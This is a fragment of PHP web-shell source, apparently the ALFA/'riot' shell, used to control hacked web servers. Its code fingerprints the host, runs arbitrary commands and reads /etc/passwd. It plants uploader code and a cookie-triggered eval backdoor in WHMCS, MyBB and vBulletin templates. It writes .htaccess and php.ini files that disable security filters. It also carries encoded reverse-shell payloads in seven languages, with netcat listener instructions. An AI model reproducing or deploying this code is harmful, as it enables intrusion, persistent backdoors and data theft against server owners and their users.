| Uname: | ' . $uname . ' | |
| User: | ' . $uid . " [ " . $user . ' ] Group: ' . $gid . " [ " . $group . ' ] | |
| PHP: | ' . @phpversion() . ' Safe Mode: ' . $safe_modes . ' | |
| ServerIP: | ' . (!@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????") : @$_SERVER["SERVER_ADDR"]) . ' Your IP: ' . @$_SERVER["REMOTE_ADDR"] . ' | |
| DateTime: | ' . date("Y-m-d H:i:s") . ' | |
| Domains: | '; if ($GLOBALS["sys"] == "unix") { $d0mains = _riot_file("/etc/named.conf", false); if (!$d0mains) { echo "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } echo "$count Domains"; } } else { echo "Cant Read [ /etc/named.conf ]"; } echo ' | |
| HDD: | Total:' . riotSize($totalSpace) . ' Free:' . riotSize($freeSpace) . " [" . (int) (($freeSpace / $totalSpace) * 100) . '%] | |
| useful:-------------- | Downloader: -------------- | '; if (!@ini_get("safe_mode")) { if (strlen(riotEx("id", false, false)) > 0) { echo '|
| Useful : '; $userful = ["gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bziriot2", "nc", "locate", "suidperl"]; $x = 0; foreach ($userful as $item) { if (riotWhich($item)) { $x++; echo '' . $item . ""; } } if ($x == 0) { echo "--------------"; $GLOBALS["need_to_update_header"] = "true"; } echo ' | ||
| Downloader: '; $downloaders = ["wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"]; $x = 0; foreach ($downloaders as $item2) { if (riotWhich($item2)) { $x++; echo '' . $item2 . ""; } } if ($x == 0) { echo "--------------"; $GLOBALS["need_to_update_header"] = "true"; } echo ' | ||
| Windows:'; echo riotEx("ver", false, false); echo ' | ||
| Downloader: ------------- | ||
| Disable Functions: ' . Alfa_GetDisable_Function() . ' | ||
| CURL :' . $curl . ' | SSH2 : ' . $ssh2 . ' | Magic Quotes : ' . $magic . ' | MySQL :' . $mysql . ' | MSSQL :' . $mssql . ' | PostgreSQL :' . $pg . ' | Oracle :' . $or . " " . ($GLOBALS["sys"] == "unix" ? '| CGI : ' . $cgi_shell : "") . ' | ||
| Open_basedir :' . $open_b . ' | Safe_mode_exec_dir :' . $safe_exe . ' | Safe_mode_include_dir :' . $safe_include . ' | ||
| SoftWare: | ' . @getenv("SERVER_SOFTWARE") . ' | |
| DRIVE: | ' . $drives . ' | |
| PWD: | ' . $cwd_links . ' [ Home Shell ] | |
File managerClick Here !
"; } function riotShellInjectors() { riothead(); echo ""; AlfaNum(11); echo '"; riotfooter(); } function riotcheckfiletype() { $path = $_POST["path"]; $arg = $_POST["arg"]; if (@is_file($path . "/" . $arg)) { echo "file"; } else { echo "dir"; } } function riotcheckcgi() { if (strlen(riotEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } function is_ipv4($ip) { return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : "(Null)"; } function __alert($s) { echo "'; if (isset($_POST["riot4"]) && !empty($_POST["riot4"])) { $method = $_POST["riot8"]; $faq_name = "faq"; $faq_file = "/faq.php"; $code = "{\${" . ALFA_UPLOADER . "}}{\${exit()}}&"; ($conn = @mysqli_connect($_POST["riot2"], $_POST["riot4"], $_POST["riot5"], $_POST["riot7"])) or die(@mysqli_connect_error()); $rec = "select `template` from " . $_POST["riot6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; if (empty($savetoass)) { $faq_name = "header"; $faq_file = "/"; $rec = "select `template` from " . $_POST["riot6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; $code = ALFA_UPLOADER . ";"; } $code = str_replace("'", "\'", $code); $p = "UPDATE " . $_POST["riot6"] . "template SET `template`='" . $code . "' WHERE `title`='" . $faq_name . "'"; ($ka = @mysqli_query($conn, $p)) or die(mysqli_error($conn)); $geturl = @mysqli_query($conn, "select `value` from " . $_POST["riot6"] . "setting WHERE `varname`='bburl'"); $getval = @mysqli_fetch_assoc($geturl); $saveval = $getval["value"]; if ($faq_name == "header") { if (substr($saveval, -5, 5) == "/core") { $saveval = substr($saveval, 0, -5); } } $realurl = parse_url($saveval, PHP_URL_HOST); $realpath = parse_url($saveval, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $p1 = "UPDATE " . $_POST["riot6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; ($ka1 = @mysqli_query($conn, $p1)) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . $faq_file); $p1 = "UPDATE " . $_POST["riot6"] . "template SET template ='" . mysqli_real_escape_string($conn, $savetoass) . "' WHERE title ='" . $faq_name . "'"; ($ka1 = @mysqli_query($conn, $p1)) or die(mysqli_error($conn)); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/riotexec.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . $faq_file; $fff = "http://" . $realurl . $realpath . "/riotexec.php"; echo " | Cms Shell Injector |'; $selector = ' | WHMCS | | MyBB | | vBulletin |
Shell Inject Method :'; if (isset($_POST["riot1"]) && $_POST["riot1"] == "whmcs") { AlfaNum(); echo __pre() . "| WHMCS |"; if (isset($_POST["riot6"])) { $dbu = $_POST["riot6"]; $dbn = $_POST["riot7"]; $dbp = $_POST["riot8"]; $dbh = $_POST["riot9"]; $path = $_POST["riot10"]; $method = $_POST["riot4"]; $index = "{php}" . ALFA_UPLOADER . ";{/php}"; $newin = str_replace("'", "\'", $index); $newindex = " " . getConfigHtml("whmcs") . "
Dear $newin,
Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.
To reset your password, please visit the url below:
{\$pw_reset_url}When you visit the link above, your password will be reset, and the new password will be emailed to you.
{\$signature}
{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { ($conn = mysqli_connect($dbh, $dbu, $dbp, $dbn)) or die(mysqli_connect_error()); $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet["message"]; $tempSave = str_replace("'", "\'", $tempSave1); mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn)); $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'"; ($result = mysqli_query($conn, $inject)) or die(mysqli_error($conn)); $create = "insert into tblclients (email) values('riotexec@fbi.gov')"; ($result2 = mysqli_query($conn, $create)) or die(mysqli_error($conn)); if (function_exists("curl_version") && $method == "auto") { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path . "/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token); $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=riotexec@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; ($Solevisible = mysqli_query($conn, $backdata)) or die(mysqli_error($conn)); __alert("shell injectet..."); $ff = "http://" . $path . "/riotexec.php"; output($ff); } else { echo "Please go to Target => " . $path . "/pwreset.php
And Reset Password With Email => riotexec@fbi.gov
And Go To => " . $path . "/riotexec.php
"; } } else { __alert("Path is not Valid..."); } } } } if (isset($_POST["riot2"]) && $_POST["riot2"] == "mybb") { AlfaNum(1, 2, 3, 5); echo __pre() . "| MyBB |"; if (isset($_POST["riot6"])) { $dbu = $_POST["riot6"]; $dbn = $_POST["riot7"]; $dbp = $_POST["riot8"]; $dbh = $_POST["riot9"]; $prefix = $_POST["riot10"]; $method = $_POST["riot4"]; $shellCode = "{\${" . ALFA_UPLOADER . "}}"; $newinshell = str_replace("'", "\'", $shellCode); if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { ($conn = mysqli_connect($dbh, $dbu, $dbp, $dbn)) or die(mysqli_error($conn)); $inject = "select template from {$prefix}templates where title= 'calendar'"; ($result = mysqli_query($conn, $inject)) or die(mysqli_error($conn)); $GetTemp = mysqli_fetch_assoc($result); $saveDate = $GetTemp["template"]; $repsave = str_replace($shellCode, "", $saveDate); $repsave = str_replace("'", "\'", $repsave); $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'"; ($result2 = mysqli_query($conn, $createShell)) or die(mysqli_error($conn)); $geturl = "select value from {$prefix}settings where name= 'bburl'"; ($findurl = mysqli_query($conn, $geturl)) or die(mysqli_error($conn)); $rowb = mysqli_fetch_assoc($findurl); $furl = $rowb["value"]; $realurl = parse_url($furl, PHP_URL_HOST); $realpath = parse_url($furl, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n"); @fputs($fsock, "HOST: $realurl\r\n"); @fputs($fsock, "Connection: close\r\n\r\n"); $check = fgets($fsock); if (preg_match("/200 OK/i", $check)) { $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'"; ($clear = mysqli_query($conn, $repairdbtemp)) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . "/calendar.php"); $res = true; } if ($res) { $ff = "http://" . $realurl . $realpath . "/riotexec.php"; output($ff); } else { $ff = "http://" . $realurl . $realpath . "/calendar.php"; $fff = "http://" . $realurl . $realpath . "/riotexec.php"; echo " " . getConfigHtml("mybb") . " Please Go To Target => " . $ff . "
And Go To => " . $fff . "
"; } } } } if (isset($_POST["riot3"]) && $_POST["riot3"] == "vb") { AlfaNum(1, 2, 7, 9, 10); echo __pre() . '| vbulletin |' . getConfigHtml("vb") . '
"; } } } echo " First Open This Link => " . $ff . "
Second Open This Link => " . $fff . "" . __pre() . $s . " "; } function create_table($data) { echo '
" .
$array["tdName"] .
" |
![](\"https://dev.artikelspiner.id/icon/newtab.svg\"){kind=icon}
Open in new tab
![](\"https://dev.artikelspiner.id/icon/link.svg\"){kind=icon}
Open file directly
![](\"https://dev.artikelspiner.id/icon/download2.svg\"){kind=icon}
Download
![](\"https://dev.artikelspiner.id/icon/view.svg\"){kind=icon}
View
View Archive
![](\"https://dev.artikelspiner.id/icon/edit.svg\"){kind=icon}
Edit
![](\"https://dev.artikelspiner.id/icon/move.svg\"){kind=icon}
Move
![](\"https://dev.artikelspiner.id/icon/copy.svg\"){kind=icon}
Copy
![](\"https://dev.artikelspiner.id/icon/rename.svg\"){kind=icon}
Rename
![](\"https://dev.artikelspiner.id/icon/time.svg\"){kind=icon}
Modify
![](\"https://dev.artikelspiner.id/icon/key.svg\"){kind=icon}
Change Permissions
![](\"https://dev.artikelspiner.id/icon/resize.svg\"){kind=icon}
Compress
![](\"https://dev.artikelspiner.id/icon/increase.svg\"){kind=icon}
Extract
![](\"https://dev.artikelspiner.id/icon/delete.svg\"){kind=icon}
Delete
';
echo htmlspecialchars(__read_file($_POST["riot1"]));
echo "' .
$h[0] .
" | " .
$h[1] .
" | " .
htmlspecialchars($h[2]) .
" |
';
}
function riotproc()
{
riothead();
echo "
";
if (empty($_POST["ajax"]) && !empty($_POST["riot1"])) {
$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false;
}
if ($GLOBALS["sys"] == "win") {
$process = [
"Task List" => "tasklist /V",
"System Info" => "systeminfo",
"Active Connections" => "netstat -an",
"Running Services" => "net start",
"User Accounts" => "net user",
"Show Computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all",
];
} else {
$process = [
"Process status" => "ps aux",
"Syslog" => "cat /etc/syslog.conf",
"Resolv" => "cat /etc/resolv.conf",
"Hosts" => "cat /etc/hosts",
"Cpuinfo" => "cat /proc/cpuinfo",
"Version" => "cat /proc/version",
"Sbin" => "ls -al /usr/sbin",
"Interrupts" => "cat /proc/interrupts",
"lsattr" => "lsattr -va",
"Uptime" => "uptime",
"Fstab" => "cat /etc/fstab",
];
}
foreach ($process as $n => $link) {
echo ' | ' . $n . " | ";
}
echo "
";
if (!empty($_POST["riot1"])) {
echo "";
if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
$cmd = "cd '" . addslashes($_POST["c"]) . "';";
}
echo riotEx($cmd . $_POST["riot1"], true);
echo "";
}
echo "";
riotfooter();
}
function riotsafe()
{
riothead();
echo "
| Auto ByPasser |";
echo '| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains |
";
}
}
}
}
} else {
echo __pre();
$users = _riot_file("/etc/virtual/domainowners");
if (is_array($users)) {
foreach ($users as $boz) {
$dom = explode(":", $boz);
echo $dom[0] . "\n";
}
}
}
}
if (!empty($_POST["riot6"]) && isset($_POST["riot6"]) == "valiases") {
echo '
Url: ';
if (isset($_POST["riot9"]) && $_POST["riot9"] == ">>") {
if (!_riot_file_exists("/etc/virtual/domainowners")) {
$site = trim($_POST["riot7"]);
$rep = str_replace(["https://", "http://", "www."], "", $site);
$user = "";
if (function_exists("posix_getpwuid") && function_exists("fileowner")) {
if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
$user = $user["name"];
}
} else {
if (_riot_can_runCommand(true, true)) {
$user = riotEx("stat -c '%U' /etc/valiases/" . $rep);
}
}
if (!empty($user) && $user != "root") {
echo __pre() .
"User: {$user} site: {$rep}
No such file or directory Or Disable Functions is not NONE... ";
}
} else {
$site = trim($_POST["riot7"]);
$rep = str_replace(["https://", "http://", "www."], "", $site);
$users = _riot_file("/etc/virtual/domainowners");
foreach ($users as $boz) {
$ex = explode(":", $boz);
if ($ex[0] == $rep) {
echo __pre() .
"
User: " .
trim($ex[1]) .
" site: {$rep}
";
}
}
}
if (!empty($_POST["riot4"]) && isset($_POST["riot4"])) {
echo __pre();
if (_riot_can_runCommand(true, true)) {
echo __read_file("/etc/passwd");
} elseif (function_exists("posix_getpwuid")) {
for ($uid = 0; $uid < 60000; $uid++) {
$ara = @posix_getpwuid($uid);
if (!empty($ara)) {
while (list($key, $val) = each($ara)) {
echo "$val:";
}
echo "\n";
}
}
} else {
__alert("failed...");
}
}
if (!empty($_POST["riot2"]) && isset($_POST["riot2"])) {
@__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n ");
echo "htaccess for Apache created...! ";
}
if (!empty($_POST["riot1"]) && isset($_POST["riot1"])) {
@__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By IDM(ALFA TEaM)");
echo " php.ini created...! ";
}
if (!empty($_POST["riot3"]) && isset($_POST["riot3"])) {
@__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n \n\nSecFilterEngine Off\nSecFilterScanPOST Off\n ");
echo "htaccess for Litespeed created...! ";
}
echo "
";
riotfooter();
}
function __get_resource($content)
{
return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content)
{
if ($fh = @fopen($file, "wb")) {
if (fwrite($fh, $content) !== false) {
return true;
}
}
return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments)
{
$res = "[ Success...! ]";
$err = "[ Failed...! ]";
if ($evalOptions != "") {
$evalOptions = $evalOptions . " ";
}
if ($evalArguments != "") {
$evalArguments = " " . $evalArguments;
}
if ($evalType == "c") {
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if (is_writable($tmpdir)) {
$uniq = substr(md5(time()), 0, 8);
$filename = $evalType . $uniq . ".c";
$path = $filename;
if (__write_file($path, $evalCode)) {
$ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out";
$pathres = $filename . $ext;
$evalOptions = "-o " . $pathres . " " . $evalOptions;
$cmd = "gcc " . $evalOptions . $path;
riotEx($cmd);
if (is_file($pathres)) {
if (chmod($pathres, 0755)) {
$cmd = $pathres . $evalArguments;
riotEx($cmd);
} else {
$res = $err;
}
unlink($pathres);
} else {
$res = $err;
}
unlink($path);
} else {
$res = $err;
}
}
return $res;
} elseif ($evalType == "java") {
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if (is_writable($tmpdir)) {
if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) {
$classname = trim($r[1]);
$filename = $classname;
} else {
$uniq = substr(md5(time()), 0, 8);
$filename = $evalType . $uniq;
$evalCode = "class " . $filename . " { " . $evalCode . " } ";
}
$path = $filename . ".java";
if (__write_file($path, $evalCode)) {
$cmd = "javac " . $evalOptions . $path;
riotEx($cmd);
$pathres = $filename . ".class";
if (is_file($pathres)) {
if (chmod($pathres, 0755)) {
$cmd = "java " . $filename . $evalArguments;
riotEx($cmd);
} else {
$res = $err;
}
unlink($pathres);
} else {
$res = $err;
}
unlink($path);
} else {
$res = $err;
}
}
return $res;
}
return false;
}
function riotconnect()
{
riothead();
$php =
"7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
$python =
"pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
$perl =
"lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
$ruby =
"tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
$node =
"nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
$c =
"tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
$java =
"lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
echo "
| Back Connect |
";
echo "Run ` nc -l -v -p port ` on your computer and press ` >> ` button
";
if (isset($_POST["riot1"]) && !empty($_POST["riot1"])) {
$lang = $_POST["riot1"];
$ip = $_POST["riot2"];
$port = $_POST["riot3"];
$arg = $_POST["riot4"] == "bind" ? $port : $port . " " . $ip;
$tmpdir = ALFA_TEMPDIR;
$name = $tmpdir . "/" . $lang . uniqid() . rand(1, 99999);
